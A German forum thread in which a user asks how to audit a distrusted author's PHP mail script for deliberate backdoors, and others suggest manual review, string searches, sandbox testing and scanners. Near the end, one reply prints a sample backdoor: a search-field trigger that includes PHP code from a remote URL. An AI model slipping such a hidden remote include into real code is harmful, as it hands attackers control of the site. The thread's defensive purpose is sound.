Hey,
ich wollte ein Skript von einer Person einsetzen, wo ich weiß, dass es problemlos geht, aber ich traue der Person nicht:
Wie prüfe ich sehr viele diverse Skript-Dateien (html, php, ...) auf Sicherheitslücken (z.B. Adminpw wird an eine Email gesendet, es wird ein User erstellt der Adminrechte hat - unsichtbar, usw)?
Also nicht Lücken die durch Zufall reingekommen sind, sondern gewollte Lücken um die Seite später nachträglich zu übernehmen.

Naja, am besten ist es sicherlich, das Script komplett durch zu schauen & zu verstehen!
Du kannst aber dein Script auch einfach mal nach auffälligen Strings durchsuchen !
Benötigt das Script Root-Rechte ? Um was für ein Script handelt es sich denn eigentlich ?
Aber eigentlich sollten dir solche Sachen auffallen, wenn du plötzlich einen neuen Benutzer etc auf deinem System finden solltest :)
Vielleicht mal virtuell testen und protokollieren.. (Veränderungen im System, in /out Traffic usw)

LG br00_pwn

Via Editor öffnen und prüfen?

MfG

Via Editor öffnen und prüfen?

MfG

Es ist nicht eine Datei, sondern es sind über 50.

Ändert nichts an meiner Aussage, wie willste das denn anders prüfen?
Es gibt kein Tool, was das für dich erledigen könnte.

MfG

Es gibt kein Tool, was das für dich erledigen könnte.
Doch, es nennt sich: durchsuchen ;)

LG br00_pwn

Ändert nichts an meiner Aussage, wie willste das denn anders prüfen?
Es gibt kein Tool, was das für dich erledigen könnte.

MfG

Das Gegenteil habe ich erhofft, also das es ein Programm gibt das nach bekannten Versuchen von soetwas sucht und die dann rauslöscht.

Doch gibt es, leider aber noch im Anfangsstadium. (RIPS)
Da würde ich mich aber mal 100% nicht drauf verlassen !

LG br00_pwn

Doch gibt es, leider aber noch im Anfangsstadium. (RIPS)
Dann sollte er das testen, wobei ich aber nicht denke, falls das schön und unauffällig programmiert ist etwas finden wird.

Doch, es nennt sich: durchsuchen ;)
Das ist leider kein Tool und ist auch wieder mein Vorschlag es mit einem Editor zu öffnen und zu analysieren. Ohne Kenntnisse wird aber auch das Durchsuchen nicht möglich sein.

MfG

Kleine Anmerkung:
Das Skript wird einfach auf einem Webspace installiert & ist ein Email-Skript.
Es wird also nicht von mir auf einem VPS / Root installiert, sondern auf einem ganz normalen Webspace.

Wenn du keinen Zugriff auf den Webspace hast, haste sowieso keine Chance, ansonsten haste ja die Vorschläge schon...

MfG

Ich habe den kompletten Zugriff auf den Webspace wo ich das Skript raufpacken will (Cpanel) und ich habe das Skript an sich als *.rar (kann ich jederzeit entpacken, so dass ich php Dateien usw. erhalte)

Und wo genau liegt jetzt dein Problem?

MfG

Und wo genau liegt jetzt dein Problem?

MfG

Das ich der Person nicht traue, die das Skript gemacht hat, und ich wissen will, ob dieses irgendeine Hintertür für ihn enthält.

Dann haste jetzt 3 Möglichkeiten:
- Öffne es mit dem Editor und schau es durch.
- Nimm das Programm was lolcat vorgeschlagen hat
- Lass es bleiben!

MfG

Dafür gibt es einTool.
Acunix Web Vuln Scanner.
Aber selbst ist der Mann ;)

Leute, wenn das Script von jemanden geschrieben wurde, der wirklich was drauf hat
(wovon ich mal ausgehe) würde ich mich auf keins dieser Tools verlassen :)
Wenn ihr eine Exe runter ladet und euer AV nicht anspringt, heißt das auch lange noch nicht, dass die Datei clean ist.
Sicherlich kannst du mit solchen Tools anfangen, um offensichtliche Lücken aufzudecken, aber um wirklich sicher zu sein, hilf nur dein Auge & Kopf :)

LG br00_pwn

Stell es Online und hoffe das es nette Leute gibt die es sich mal anschauen ;)

try this:
http://eddy14.jmp-esp.net/docs/php-vulnz.txt

Das bringt ihm alles rein garnichts :D
Wenn ich eine hintertür einbauen würden, würde ich ganz einfach z.B. in der Suche einbauen:
Wenn die eingabe = shell ist, include("shell.php");



if($_POST['suche'] == "shell"){
include("http://seite.de/datei.php");
}


Du musst den ganzen Quelltext durchgucken, damit du dir 100% sicher sein kannst.